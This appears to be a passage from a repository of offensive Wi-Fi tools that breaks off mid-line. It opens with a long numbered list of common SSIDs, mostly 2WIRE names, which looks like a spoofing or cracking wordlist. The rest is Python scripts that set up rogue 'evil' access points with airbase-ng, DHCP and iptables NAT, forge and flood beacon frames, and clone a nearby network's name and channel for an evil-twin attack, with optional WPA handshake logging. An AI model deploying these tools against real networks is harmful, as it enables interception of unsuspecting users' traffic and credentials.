| 2WIRE565 376 | 2WIRE184 377 | mynet 378 | Lee 379 | ELSA 380 | Draadloos 381 | 2WIRE945 382 | virus 383 | studio 384 | maison 385 | 2WIRE860 386 | 2WIRE646 387 | ^Y 388 | UofM Wireless 389 | getwifi 390 | AISD-GUEST 391 | 2WIRE756 392 | 2WIRE358 393 | 2WIRE067 394 | 2WIRE790 395 | 2WIRE690 396 | 2WIRE608 397 | 2WIRE558 398 | 2WIRE433 399 | signNet 400 | Library 401 | 2WIRE279 402 | 2WIRE270 403 | 2WIRE233 404 | 2WIRE173 405 | holiday 406 | 2WIRE859 407 | 2WIRE663 408 | 2WIRE569 409 | 2WIRE328 410 | 2WIRE191 411 | 2WIRE814 412 | 2wire783 413 | 2WIRE651 414 | 2WIRE283 415 | tim 416 | Lucent Outdoor Router 417 | Agere Systems 418 | 2WIRE973 419 | 2WIRE589 420 | 2WIRE463 421 | 2WIRE438 422 | 2wire420 423 | 2WIRE353 424 | 2WIRE247 425 | 2WIRE153 426 | cci 427 | 2WIRE913 428 | 2WIRE852 429 | 2WIRE670 430 | 2WIRE622 431 | 2WIRE597 432 | 2WIRE369 433 | 2WIRE224 434 | 2WIRE126 435 | onenet 436 | 2WIRE432 437 | 2WIRE285 438 | 2WIRE239 439 | 2WIRE094 440 | 2WIRE083 441 | 2WIRE029 442 | wilson 443 | 2WIRE975 444 | 2WIRE708 445 | 2WIRE453 446 | 2WIRE447 447 | 2WIRE366 448 | 2WIRE339 449 | 2WIRE317 450 | 2WIRE057 451 | 2WIRE817 452 | 2WIRE760 453 | 2WIRE677 454 | 2WIRE654 455 | 2WIRE509 456 | 2WIRE370 457 | 2WIRE232 458 | 2WIRE140 459 | 2WIRE038 460 | 2WIRE025 461 | SurfandSip 462 | pvdorm 463 | Kimpton 464 | 2WIRE990 465 | 2WIRE951 466 | 2WIRE572 467 | 2WIRE475 468 | 2WIRE411 469 | 2WIRE377 470 | 2WIRE365 471 | 2WIRE220 472 | 2WIRE093 473 | 2WIRE907 474 | 2WIRE535 475 | 2WIRE451 476 | 2WIRE294 477 | 2WIRE234 478 | 2WIRE106 479 | 2WIRE096 480 | Holiday Inn 481 | ba2 482 | 2WIRE914 483 | 2WIRE789 484 | 2WIRE341 485 | 2WIRE307 486 | 2WIRE298 487 | 2WIRE135 488 | poswireless 489 | Netgear1 490 | 2WIRE879 491 | 2WIRE842 492 | 2WIRE710 493 | 2WIRE596 494 | 2WIRE595 495 | 2WIRE437 496 | 2WIRE428 497 | 2WIRE405 498 | 2WIRE256 499 | 2WIRE041 500 | 2WIRE923 501 | 2WIRE856 502 | 2WIRE672 503 | 2WIRE478 504 | 2WIRE454 505 | 2WIRE367 506 | 2WIRE354 507 | 2WIRE303 508 | 2WIRE253 509 | 2WIRE176 510 | 2WIRE151 511 | 2WIRE043 512 | 2WIRE998 513 | 2WIRE967 514 | 2WIRE741 515 | 2WIRE732 516 | 2WIRE711 517 | 2WIRE586 518 | 2WIRE417 519 | 2WIRE373 520 | 2WIRE356 521 | 2WIRE181 522 | 2WIRE138 523 | 2WIRE118 524 | 2WIRE074 525 | 2WIRE061 526 | suitespeed 527 | 2WIRE952 528 | 2WIRE944 529 | 2WIRE864 530 | 2wire722 531 | 2WIRE653 532 | 2WIRE581 533 | 2WIRE541 534 | 2wire468 535 | 2WIRE383 536 | 2WIRE347 537 | 2WIRE315 538 | 2WIRE275 539 | 2WIRE226 540 | 2WIRE225 541 | 2WIRE158 542 | 2WIRE142 543 | 2WIRE007 544 | HotelNet 545 | GeorgeAP22 546 | AMAT_Prod 547 | 2WIRE930 548 | 2WIRE668 549 | 2WIRE616 550 | 2WIRE524 551 | 2WIRE442 552 | 2WIRE424 553 | 2WIRE340 554 | 2WIRE235 555 | 2WIRE186 556 | 2WIRE182 557 | JACK 558 | airnet 559 | 7590000001 560 | 2WIRE925 561 | 2WIRE919 562 | 2WIRE818 563 | 2WIRE800 564 | 2WIRE753 565 | 2WIRE704 566 | 2WIRE701 567 | 2WIRE598 568 | 2WIRE588 569 | 2WIRE579 570 | 2WIRE563 571 | 2WIRE449 572 | 2WIRE378 573 | 2WIRE309 574 | 2WIRE252 575 | 2WIRE250 576 | 2WIRE197 577 | 2WIRE175 578 | 2WIRE100 579 | ITS Wireless 580 | airimba 581 | 2WIRE918 582 | 2WIRE911 583 | 2WIRE896 584 | 2WIRE867 585 | 2WIRE787 586 | 2WIRE785 587 | 2WIRE755 588 | 2WIRE624 589 | 2WIRE593 590 | 2WIRE564 591 | 2WIRE430 592 | 2WIRE400 593 | 2WIRE391 594 | 2WIRE313 595 | 2WIRE305 596 | 2WIRE266 597 | 2WIRE148 598 | 2WIRE145 599 | 2WIRE144 600 | 2WIRE116 601 | 2WIRE092 602 | X-Micro 603 | Green 604 | dnawlan 605 | andy 606 | alpha 607 | 2WIRE788 608 | 2WIRE552 609 | 2WIRE528 610 | 2WIRE518 611 | 2WIRE515 612 | 2WIRE471 613 | 2WIRE431 614 | 2WIRE418 615 | 2WIRE348 616 | 2WIRE330 617 | 2WIRE318 618 | 2WIRE280 619 | 2WIRE268 620 | 2WIRE254 621 | 2WIRE240 622 | pi07490509x09sa 623 | 2WIRE992 624 | 2WIRE891 625 | 2WIRE717 626 | 2WIRE700 627 | 2WIRE652 628 | 2WIRE587 629 | 2WIRE560 630 | 2WIRE533 631 | 2WIRE484 632 | 2WIRE414 633 | 2WIRE385 634 | 2WIRE376 635 | 2WIRE371 636 | 2WIRE104 637 | 2WIRE080 638 | 2WIRE048 639 | 2WIRE018 640 | davis 641 | B2B 642 | arwain.net 643 | 2WIRE950 644 | 2WIRE929 645 | 2WIRE874 646 | 2WIRE846 647 | 2WIRE793 648 | 2WIRE792 649 | 2WIRE674 650 | 2WIRE591 651 | 2WIRE519 652 | 2WIRE335 653 | 2WIRE312 654 | 2WIRE274 655 | 2WIRE204 656 | 2WIRE179 657 | 2WIRE113 658 | 2WIRE111 659 | 2WIRE099 660 | 2WIRE077 661 | 2WIRE072 662 | 2WIRE854 663 | 2WIRE754 664 | 2WIRE752 665 | 2WIRE724 666 | 2WIRE720 667 | 2WIRE707 668 | 2WIRE689 669 | 2WIRE603 670 | 2WIRE553 671 | 2WIRE485 672 | 2WIRE455 673 | 2WIRE415 674 | 2WIRE249 675 | 2WIRE218 676 | 2WIRE213 677 | 2WIRE200 678 | 2WIRE079 679 | 2WIRE053 680 | 2WIRE047 681 | 2WIRE030 682 | hilton 683 | 2WIRE962 684 | 2WIRE889 685 | 2WIRE884 686 | 2WIRE771 687 | 2WIRE718 688 | 2WIRE688 689 | 2WIRE665 690 | 2WIRE655 691 | 2WIRE647 692 | 2WIRE620 693 | 2wire619 694 | 2WIRE606 695 | 2WIRE600 696 | 2WIRE584 697 | 2WIRE583 698 | 2WIRE566 699 | 2WIRE546 700 | 2WIRE538 701 | 2WIRE474 702 | 2WIRE360 703 | 2wire304 704 | 2WIRE293 705 | 2WIRE292 706 | 2WIRE262 707 | 2WIRE261 708 | 2WIRE188 709 | 2WIRE150 710 | 2WIRE064 711 | 2wire046 712 | 2WIRE044 713 | charlie 714 | 2WIRE941 715 | 2WIRE833 716 | 2wire746 717 | 2WIRE709 718 | 2WIRE680 719 | 2WIRE667 720 | 2WIRE656 721 | 2WIRE635 722 | 2WIRE627 723 | 2WIRE617 724 | 2WIRE612 725 | 2WIRE611 726 | 2WIRE590 727 | 2WIRE548 728 | 2WIRE514 729 | 2WIRE506 730 | 2wire429 731 | 2WIRE427 732 | 2WIRE422 733 | 2WIRE355 734 | 2WIRE316 735 | 2WIRE284 736 | 2WIRE227 737 | 2WIRE193 738 | 2WIRE171 739 | 2WIRE168 740 | 2WIRE157 741 | 2WIRE132 742 | 2WIRE089 743 | 2WIRE085 744 | 2WIRE068 745 | 2WIRE059 746 | mcsy 747 | Barney 748 | 2WIRE985 749 | 2WIRE940 750 | 2WIRE886 751 | 2WIRE885 752 | 2WIRE825 753 | 2WIRE801 754 | 2WIRE739 755 | 2WIRE726 756 | 2WIRE706 757 | 2WIRE693 758 | 2WIRE683 759 | 2WIRE657 760 | 2WIRE632 761 | 2WIRE615 762 | 2WIRE582 763 | 2WIRE531 764 | 2WIRE529 765 | 2WIRE497 766 | 2WIRE441 767 | 2WIRE425 768 | 2WIRE368 769 | 2WIRE361 770 | 2WIRE337 771 | 2WIRE301 772 | 2WIRE282 773 | 2WIRE271 774 | 2WIRE169 775 | 2WIRE065 776 | Galaxy 777 | Baymont 778 | 2WIRE984 779 | 2WIRE961 780 | 2WIRE826 781 | 2WIRE795 782 | 2wire794 783 | 2WIRE774 784 | 2WIRE773 785 | 2WIRE714 786 | 2WIRE698 787 | 2WIRE687 788 | 2WIRE517 789 | 2WIRE498 790 | 2WIRE495 791 | 2WIRE444 792 | 2WIRE443 793 | 2WIRE392 794 | 2wire384 795 | 2WIRE336 796 | 2WIRE311 797 | 2WIRE222 798 | 2WIRE172 799 | 2WIRE146 800 | 2WIRE110 801 | STOPS 802 | jennifer 803 | gigabyte 804 | 2WIRE964 805 | 2WIRE935 806 | 2WIRE878 807 | 2WIRE861 808 | 2WIRE778 809 | 2WIRE750 810 | 2WIRE678 811 | 2WIRE675 812 | 2WIRE639 813 | 2WIRE513 814 | 2WIRE501 815 | 2WIRE476 816 | 2WIRE394 817 | 2WIRE345 818 | 2WIRE199 819 | 2WIRE159 820 | 2WIRE032 821 | greg 822 | 2WIRE908 823 | 2WIRE866 824 | 2WIRE738 825 | 2WIRE686 826 | 2WIRE642 827 | 2WIRE539 828 | 2WIRE516 829 | 2WIRE408 830 | 2WIRE333 831 | 2WIRE300 832 | 2WIRE277 833 | 2WIRE263 834 | 2WIRE241 835 | 2WIRE206 836 | 2WIRE115 837 | 2WIRE095 838 | 2WIRE997 839 | 2WIRE937 840 | 2WIRE926 841 | 2WIRE837 842 | 2WIRE810 843 | 2WIRE744 844 | 2WIRE659 845 | 2wire633 846 | 2WIRE545 847 | 2WIRE532 848 | 2WIRE526 849 | 2WIRE393 850 | 2WIRE363 851 | 2WIRE352 852 | 2WIRE346 853 | 2WIRE324 854 | 2WIRE291 855 | 2WIRE286 856 | 2WIRE259 857 | 2WIRE208 858 | 2WIRE196 859 | 2WIRE187 860 | 2WIRE147 861 | 2WIRE125 862 | 2WIRE070 863 | wxyz 864 | Home AirPort 865 | CONNECT2AIR 866 | 2WIRE991 867 | 2WIRE955 868 | 2WIRE927 869 | 2WIRE768 870 | 2WIRE737 871 | 2WIRE684 872 | 2WIRE669 873 | 2WIRE621 874 | 2WIRE551 875 | 2WIRE488 876 | 2WIRE470 877 | 2WIRE435 878 | 2WIRE413 879 | 2WIRE295 880 | 2WIRE260 881 | 2WIRE255 882 | 2WIRE210 883 | 2WIRE185 884 | 2wire129 885 | 2WIRE050 886 | nuwlan 887 | 2WIRE995 888 | 2WIRE979 889 | 2WIRE921 890 | 2WIRE906 891 | 2WIRE850 892 | 2WIRE841 893 | 2wire824 894 | 2WIRE766 895 | 2WIRE751 896 | 2WIRE723 897 | 2WIRE648 898 | 2WIRE640 899 | 2WIRE614 900 | 2WIRE481 901 | 2WIRE472 902 | 2WIRE459 903 | 2WIRE436 904 | 2WIRE390 905 | 2WIRE382 906 | 2WIRE374 907 | 2WIRE364 908 | 2WIRE323 909 | 2WIRE290 910 | 2WIRE281 911 | 2WIRE141 912 | 2WIRE133 913 | 2WIRE114 914 | 2WIRE108 915 | 2WIRE069 916 | 2WIRE045 917 | 2WIRE009 918 | nowires 919 | 2WIRE948 920 | 2WIRE902 921 | 2WIRE828 922 | 2WIRE820 923 | 2WIRE743 924 | 2WIRE735 925 | 2WIRE610 926 | 2WIRE507 927 | 2WIRE456 928 | 2WIRE439 929 | 2WIRE319 930 | 2WIRE299 931 | 2WIRE178 932 | 2WIRE103 933 | 2WIRE066 934 | 2WIRE051 935 | 2WIRE005 936 | ÜRegency 937 | LISA 938 | 2WIRE976 939 | 2WIRE898 940 | 2WIRE895 941 | 2WIRE882 942 | 2WIRE875 943 | 2WIRE834 944 | 2WIRE699 945 | 2WIRE681 946 | 2WIRE592 947 | 2WIRE576 948 | 2WIRE537 949 | 2WIRE521 950 | 2WIRE511 951 | 2WIRE410 952 | 2WIRE325 953 | 2WIRE308 954 | 2WIRE273 955 | 2WIRE269 956 | 2WIRE237 957 | 2WIRE217 958 | 2WIRE203 959 | 2WIRE177 960 | 2WIRE042 961 | 2WIRE037 962 | 2WIRE036 963 | 2WIRE031 964 | 2wire021 965 | UIUCnet 966 | 2WIRE965 967 | 2WIRE957 968 | 2WIRE946 969 | 2WIRE943 970 | 2WIRE931 971 | 2WIRE873 972 | 2WIRE857 973 | 2WIRE839 974 | 2WIRE835 975 | 2WIRE822 976 | 2WIRE807 977 | 2WIRE747 978 | 2WIRE712 979 | 2WIRE692 980 | 2WIRE682 981 | 2WIRE679 982 | 2WIRE605 983 | 2WIRE599 984 | 2WIRE559 985 | 2WIRE508 986 | 2WIRE496 987 | 2WIRE490 988 | 2WIRE452 989 | 2WIRE450 990 | 2WIRE434 991 | 2WIRE419 992 | 2WIRE401 993 | 2WIRE398 994 | 2WIRE372 995 | 2WIRE331 996 | 2WIRE238 997 | 2WIRE130 998 | 2wire122 999 | 2WIRE088 1000 | 2WIRE060 1001 | -------------------------------------------------------------------------------- /AP/Soft-AP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: Utf-8 -*- 3 | 4 | __app__ = 'SoftAP Maker' 5 | __verions__ = '0.3' 6 | __author__ = 'MatToufoutu' 7 | 8 | import os 9 | from sys import exit as sysexit 10 | from commands import getoutput 11 | from threading import Thread 12 | from time import sleep 13 | 14 | def airBase(bssid, essid, channel, iface): 15 | os.system("modprobe tun 2>&1 1>& /dev/null") 16 | os.system("xterm -e airbase-ng -a %s -e '%s' -c %s %s" % (bssid, essid, channel, iface)) 17 | 18 | #CHECK IF USER IS ROOT 19 | if getoutput('whoami') != 'root': 20 | print("You have to be root!") 21 | sysexit() 22 | 23 | os.system("clear") 24 | print("\n\t\t\t[ SoftAP Maker ]") 25 | 26 | # GET SETTINGS FOR THE FAKE AP 27 | IFACE, BSSID, ESSID, CHANNEL = '', '', '', 0 28 | DHCPDCONF=""" 29 | ## This configuration was auto-generated for SoftAP 30 | ddns-update-style ad-hoc; 31 | default-lease-time 600; 32 | max-lease-time 7200; 33 | subnet 10.0.0.0 netmask 255.255.255.0 { 34 | option subnet-mask 255.255.255.0; 35 | option broadcast-address 10.0.0.255; 36 | option routers 10.0.0.1; 37 | option domain-name-servers 208.67.222.222, 208.67.220.220; 38 | range 10.0.0.10 10.0.0.20; 39 | } 40 | ## End of SoftAP auto-generated config 41 | """ 42 | 43 | IFACE = raw_input("\nWireless interface to use\n>>> ") 44 | while IFACE not in getoutput('iwconfig'): 45 | print("Interface %s can't be found, please try again\n" % IFACE) 46 | IFACE = raw_input("Wireless interface to use\n>>> ") 47 | if not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[0] \ 48 | and not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[1]: 49 | print("Switching interface to Monitor Mode") 50 | os.system('airmon-ng start '+IFACE+' > /dev/null') 51 | if not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[0] \ 52 | and not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[1]: 53 | print("Could not switch interface to monitor mode") 54 | print("If your interface use VAPs, specify directly your monitor interface") 55 | sysexit() 56 | 57 | OUT_IFACE = raw_input("\nInternet connection interface\n>>> ") 58 | while OUT_IFACE not in getoutput('ifconfig'): 59 | print("Interface %s can't be found, please try again\n>>> " % OUT_IFACE) 60 | OUT_IFACE = raw_input("Internet connection interface\n>>> ") 61 | 62 | BSSID = raw_input("\nFake AP's BSSID (leave blank to use card's @mac)\n>>> ") 63 | while (len(BSSID) != 17) and (BSSID.count(':') != 5): 64 | if BSSID == '': 65 | BSSID = getoutput('macchanger -s '+IFACE+" | awk '{print $3}'") 66 | break 67 | print("BSSID %s in not valid. Please try again" % BSSID) 68 | BSSID = raw_input("Fake AP's BSSID (leave blank to use card's @mac)\n>>> ") 69 | 70 | ESSID = raw_input("\nFake AP's ESSID\n>>> ") 71 | while ESSID == '': 72 | print("You MUST enter an ESSID for your Fake AP") 73 | ESSID = raw_input("Fake AP's ESSID\n>>> ") 74 | 75 | CHANNEL = raw_input("\nChannel to use\n>>> ") 76 | while not CHANNEL.isdigit() and not (0 < int(CHANNEL) < 14): 77 | print("Channel %s is not valid. It must be 1 to 13. Please try again") 78 | CHANNEL = raw_input("Channel to use\n>>> ") 79 | 80 | #SETUP FAKE AP 81 | print("\n\nStarting airbase-ng in a separate window") 82 | fakeAP = Thread(None, airBase, None, (BSSID, ESSID, CHANNEL, IFACE), {}) 83 | fakeAP.start() 84 | sleep(3) 85 | os.system('ifconfig at0 up && \ 86 | ifconfig at0 10.0.0.1 netmask 255.255.255.0 && \ 87 | ifconfig at0 mtu 1500 && \ 88 | route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1') 89 | configfile = open('dhcpd.conf', 'w') 90 | configfile.write(DHCPDCONF) 91 | configfile.close() 92 | print("\nStarting DHCP server for SoftAP clients") 93 | os.system('dhcpd -cf dhcpd.conf at0 || dhcpd3 -cf dhcpd.conf at0') 94 | print("\nSetting up iptables and ip forwarding") 95 | if os.path.exists(os.getcwd()+'/iptables.rules'): 96 | os.remove(os.getcwd()+'/iptables.rules') 97 | os.system('iptables-save > iptables.rules && \ 98 | iptables -F && iptables -X && iptables -Z && \ 99 | iptables -t nat -F && iptables -t nat -X && iptables -t nat -Z && \ 100 | echo 1 > /proc/sys/net/ipv4/ip_forward && \ 101 | iptables -t nat --append POSTROUTING --out-interface %s -j MASQUERADE' 102 | % OUT_IFACE) 103 | endAP = raw_input("\nPress to stop the SoftAP") 104 | 105 | #STOP AP AND RESTORE CONFIGURATIONS 106 | print("Restoring all configurations") 107 | dhcp_pid = getoutput("ps aux | grep -v grep | grep 'dhcpd -cf dhcpd.conf' | awk '{print $2}'") 108 | airbase_pid = getoutput("ps aux | grep -v grep | grep airbase-ng | awk '{print $2}'") 109 | os.system('kill -9 %s && killall airbase-ng && \ 110 | iptables -t nat -F && iptables -t nat -X && iptables -t nat -Z && \ 111 | iptables-restore < iptables.rules && \ 112 | echo 0 > /proc/sys/net/ipv4/ip_forward' % dhcp_pid) 113 | os.remove(os.getcwd()+'/dhcpd.conf') 114 | os.remove(os.getcwd()+'/iptables.rules') 115 | print("\nThanks for using SoftAP Maker\n") 116 | sysexit() -------------------------------------------------------------------------------- /AP/ap-airbase.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | # 4 | # author: @090h 5 | from subprocess import Popen 6 | from time import sleep 7 | 8 | class EvilAccessPoint(): 9 | def __init__(self, ip='192.168.1.1', mask='255.255.255.0', iface='wlan0', essid='BeelineWiFi'): 10 | self.ip, self.mask, self.iface, self.essid = ip, mask, iface, essid 11 | 12 | def run(self): 13 | print("Starting AP") 14 | Popen(['airmon-ng', 'stop', self.iface], stdout=None, stderr=None).wait() 15 | Popen(['airmon-ng', 'start', self.iface], stdout=None).wait() 16 | #Popen(['screen', '-d', '-m', '-S', 'ap', 'airbase-ng', '-P', '-C', '30', '-e', self.essid, '-v', 'mon0']).wait() 17 | Popen(['screen', '-d', '-m', '-S', 'ap', 'airbase-ng', '-e', self.essid, '-v', 'mon0']).wait() 18 | sleep(3) 19 | Popen(['ifconfig', 'at0', 'up', self.ip, 'netmask', self.mask],).wait() 20 | 21 | 22 | if __name__ == '__main__': 23 | EvilAccessPoint().run() -------------------------------------------------------------------------------- /AP/ap-lorcon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | import sys 5 | import random 6 | from time import sleep 7 | import PyLorcon2 8 | 9 | from impacket import dot11 10 | from impacket.dot11 import Dot11 11 | from impacket.dot11 import Dot11Types 12 | from impacket.dot11 import Dot11ManagementFrame 13 | from impacket.dot11 import Dot11ManagementBeacon 14 | 15 | def getBeacon(src, ssid): 16 | "Return 802.11 Beacon Frame." 17 | 18 | # Frame Control 19 | frameCtrl = Dot11(FCS_at_end = False) 20 | frameCtrl.set_version(0) 21 | frameCtrl.set_type_n_subtype(Dot11Types.DOT11_TYPE_MANAGEMENT_SUBTYPE_BEACON) 22 | # Frame Control Flags 23 | frameCtrl.set_fromDS(0) 24 | frameCtrl.set_toDS(0) 25 | frameCtrl.set_moreFrag(0) 26 | frameCtrl.set_retry(0) 27 | frameCtrl.set_powerManagement(0) 28 | frameCtrl.set_moreData(0) 29 | frameCtrl.set_protectedFrame(0) 30 | frameCtrl.set_order(0) 31 | 32 | # Management Frame 33 | sequence = random.randint(0, 4096) 34 | broadcast = [0xff, 0xff, 0xff, 0xff, 0xff, 0xff] 35 | mngtFrame = Dot11ManagementFrame() 36 | mngtFrame.set_duration(0) 37 | mngtFrame.set_destination_address(broadcast) 38 | mngtFrame.set_source_address(src) 39 | mngtFrame.set_bssid(broadcast) 40 | mngtFrame.set_fragment_number(0) 41 | mngtFrame.set_sequence_number(sequence) 42 | 43 | # Beacon Frame 44 | baconFrame = Dot11ManagementBeacon() 45 | baconFrame.set_ssid(ssid) 46 | baconFrame.set_supported_rates([0x82, 0x84, 0x8b, 0x96, 0x0c, 0x18, 0x30, 0x48]) 47 | baconFrame._set_element(dot11.DOT11_MANAGEMENT_ELEMENTS.EXT_SUPPORTED_RATES, "\x12\x24\x60\x6c") 48 | 49 | mngtFrame.contains(baconFrame) 50 | frameCtrl.contains(mngtFrame) 51 | 52 | return frameCtrl.get_packet() 53 | 54 | if __name__ == "__main__": 55 | if len(sys.argv) != 3: 56 | print "Usage" 57 | print " %s " % sys.argv[0] 58 | sys.exit() 59 | 60 | iface = sys.argv[1] 61 | essid = sys.argv[2] 62 | 63 | context = PyLorcon2.Context(iface) 64 | context.open_injmon() 65 | moniface = context.get_capiface() 66 | 67 | src = [0x00, 0x00, 0x00, 0x11, 0x22, 0x33] 68 | beacon = getBeacon(src, essid) 69 | 70 | if essid == "": 71 | essid = "broadcast" 72 | 73 | print "Using interface %s" % iface 74 | print "Creating fake AP with name '%s'." % essid 75 | 76 | while True: 77 | context.send_bytes(beacon) 78 | sleep(0.1) -------------------------------------------------------------------------------- /AP/ap-scapy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from scapy.all import * 4 | from sys import argv, exit 5 | 6 | # def fake_ap_2(iface, ssid, pkt_count=0): 7 | # pkt = Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=RandMAC(),addr3=RandMAC())/ 8 | # Dot11Beacon(cap="ESS")/ 9 | # Dot11Elt(ID="SSID",info='I should see this')/ 10 | # Dot11Elt(ID="Rates",info='\x82\x84\x0b\x16')/ 11 | # Dot11Elt(ID="DSset",info="\x03")/ 12 | # Dot11Elt(ID="TIM",info="\x00\x01\x00\x00") 13 | # 14 | # sendp(pkt, iface=iface, loop=1) 15 | 16 | def fake_ap(iface, ssid, loop=1,): 17 | sendp(RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=RandMAC(), addr3=RandMAC())/ 18 | # send(Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=RandMAC(), addr3=RandMAC())/ 19 | Dot11Beacon(cap="ESS")/ 20 | Dot11Elt(ID="SSID",info=ssid)/ 21 | Dot11Elt(ID="Rates",info='\x82\x84\x0b\x16')/ 22 | Dot11Elt(ID="DSset",info="\x03")/ 23 | Dot11Elt(ID="TIM",info="\x00\x01\x00\x00"), iface=iface, loop=loop) 24 | 25 | if __name__ == '__main__': 26 | if len(argv) == 1: 27 | print('Specify interface. Example: ./ap-scapy.py wlan2') 28 | exit(0) 29 | 30 | fake_ap(argv[1], 'HackSSID') -------------------------------------------------------------------------------- /AP/fap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | # FAP - FAP - FAP - FAP 4 | # Fuzzing Access Point 5 | # FAP - FAP - FAP - FAP 6 | 7 | __author__ = '090h' 8 | __license__ = 'GPL' 9 | 10 | from sys import argv, exit 11 | from os import path 12 | from subprocess import Popen, PIPE 13 | from threading import Thread, Lock 14 | import os 15 | import time 16 | import sys 17 | import re 18 | import signal 19 | import argparse 20 | import logging 21 | import socket 22 | import struct 23 | import fcntl 24 | 25 | 26 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 27 | from scapy.all import * 28 | conf.verb = 0 29 | 30 | # Console colors 31 | W = '\033[0m' # white (normal) 32 | R = '\033[31m' # red 33 | G = '\033[32m' # green 34 | O = '\033[33m' # orange 35 | B = '\033[34m' # blue 36 | P = '\033[35m' # purple 37 | C = '\033[36m' # cyan 38 | GR = '\033[37m' # gray 39 | T = '\033[93m' # tan 40 | 41 | lock = Lock() 42 | DN = open(os.devnull, 'w') 43 | APs = {} # for listing APs 44 | chan = 0 # for channel hopping Thread 45 | count = 0 # for channel hopping Thread 46 | forw = '0\n' # for resetting ip forwarding to original state 47 | ap_mac = '' # for sniff's cb function 48 | err = None # check if channel hopping is working 49 | 50 | 51 | 52 | def channel_hop(mon_iface): 53 | global chan, err 54 | while 1: 55 | try: 56 | err = None 57 | if chan > 11: 58 | chan = 0 59 | chan = chan+1 60 | channel = str(chan) 61 | iw = Popen(['iw', 'dev', mon_iface, 'set', 'channel', channel], stdout=DN, stderr=PIPE) 62 | for line in iw.communicate()[1].split('\n'): 63 | if len(line) > 2: # iw dev shouldnt display output unless there's an error 64 | with lock: 65 | err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W+'\n \ 66 | Try disconnecting the monitor mode\'s parent interface (e.g. wlan0)\n \ 67 | from the network if you have not already\n' 68 | break 69 | time.sleep(1) 70 | except KeyboardInterrupt: 71 | sys.exit() 72 | 73 | def target_APs(): 74 | os.system('clear') 75 | if err: 76 | print err 77 | print '['+G+'+'+W+'] Ctrl-C at any time to copy an access point from below' 78 | print 'num ch ESSID' 79 | print '---------------' 80 | for ap in APs: 81 | print G+str(ap).ljust(2)+W+' - '+APs[ap][0].ljust(2)+' - '+T+APs[ap][1]+W 82 | 83 | def copy_AP(): 84 | copy = None 85 | while not copy: 86 | try: 87 | copy = raw_input('\n['+G+'+'+W+'] Choose the ['+G+'num'+W+'] of the AP you wish to copy: ') 88 | copy = int(copy) 89 | except Exception: 90 | copy = None 91 | continue 92 | channel = APs[copy][0] 93 | essid = APs[copy][1] 94 | if str(essid) == "\x00": 95 | essid = ' ' 96 | mac = APs[copy][2] 97 | return channel, essid, mac 98 | 99 | def targeting_cb(pkt): 100 | global APs, count 101 | if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp): 102 | try: 103 | ap_channel = str(ord(pkt[Dot11Elt:3].info)) 104 | except Exception: 105 | return 106 | essid = pkt[Dot11Elt].info 107 | mac = pkt[Dot11].addr2 108 | if len(APs) > 0: 109 | for num in APs: 110 | if essid in APs[num][1]: 111 | return 112 | count += 1 113 | APs[count] = [ap_channel, essid, mac] 114 | target_APs() 115 | 116 | def iwconfig(): 117 | monitors = [] 118 | interfaces = {} 119 | proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN) 120 | for line in proc.communicate()[0].split('\n'): 121 | if len(line) == 0: continue # Isn't an empty string 122 | if line[0] != ' ': # Doesn't start with space 123 | #ignore_iface = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]|at[0-9]', line) 124 | #if not ignore_iface: # Isn't wired or at0 tunnel 125 | iface = line[:line.find(' ')] # is the interface name 126 | if 'Mode:Monitor' in line: 127 | monitors.append(iface) 128 | elif 'IEEE 802.11' in line: 129 | if "ESSID:\"" in line: 130 | interfaces[iface] = 1 131 | else: 132 | interfaces[iface] = 0 133 | return monitors, interfaces 134 | 135 | def rm_mon(): 136 | monitors, interfaces = iwconfig() 137 | for m in monitors: 138 | if 'mon' in m: 139 | Popen(['airmon-ng', 'stop', m], stdout=DN, stderr=DN) 140 | else: 141 | Popen(['ifconfig', m, 'down'], stdout=DN, stderr=DN) 142 | Popen(['iw', 'dev', m, 'mode', 'managed'], stdout=DN, stderr=DN) 143 | Popen(['ifconfig', m, 'up'], stdout=DN, stderr=DN) 144 | 145 | 146 | 147 | def AP_iface(interfaces, inet_iface): 148 | for i in interfaces: 149 | if i != inet_iface: 150 | return i 151 | 152 | def start_monitor(ap_iface, channel): 153 | proc = Popen(['airmon-ng', 'start', ap_iface, channel], stdout=PIPE, stderr=DN) 154 | for line in proc.communicate()[0].split('\n'): 155 | if "monitor mode enabled" in line: 156 | line = line.split() 157 | mon_iface = line[4][:-1] 158 | return mon_iface 159 | 160 | def get_mon_mac(mon_iface): 161 | '''http://stackoverflow.com/questions/159137/getting-mac-address''' 162 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 163 | info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15])) 164 | mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1] 165 | return mac 166 | 167 | def start_ap(mon_iface, channel, essid, args): 168 | print '['+T+'*'+W+'] Starting the fake access point...' 169 | if args.wpa: 170 | Popen(['airbase-ng', '-P', '-Z', '4', '-W', '1', '-c', channel, '-e', essid, '-v', mon_iface, '-F', 'fakeAPlog'], stdout=DN, stderr=DN) 171 | else: 172 | Popen(['airbase-ng', '-c', channel, '-e', essid, '-v', mon_iface], stdout=DN, stderr=DN) 173 | try: 174 | time.sleep(6) # Copied from Pwnstar which said it was necessary? 175 | except KeyboardInterrupt: 176 | cleanup(None, None) 177 | Popen(['ifconfig', 'at0', 'up', '10.0.0.1', 'netmask', 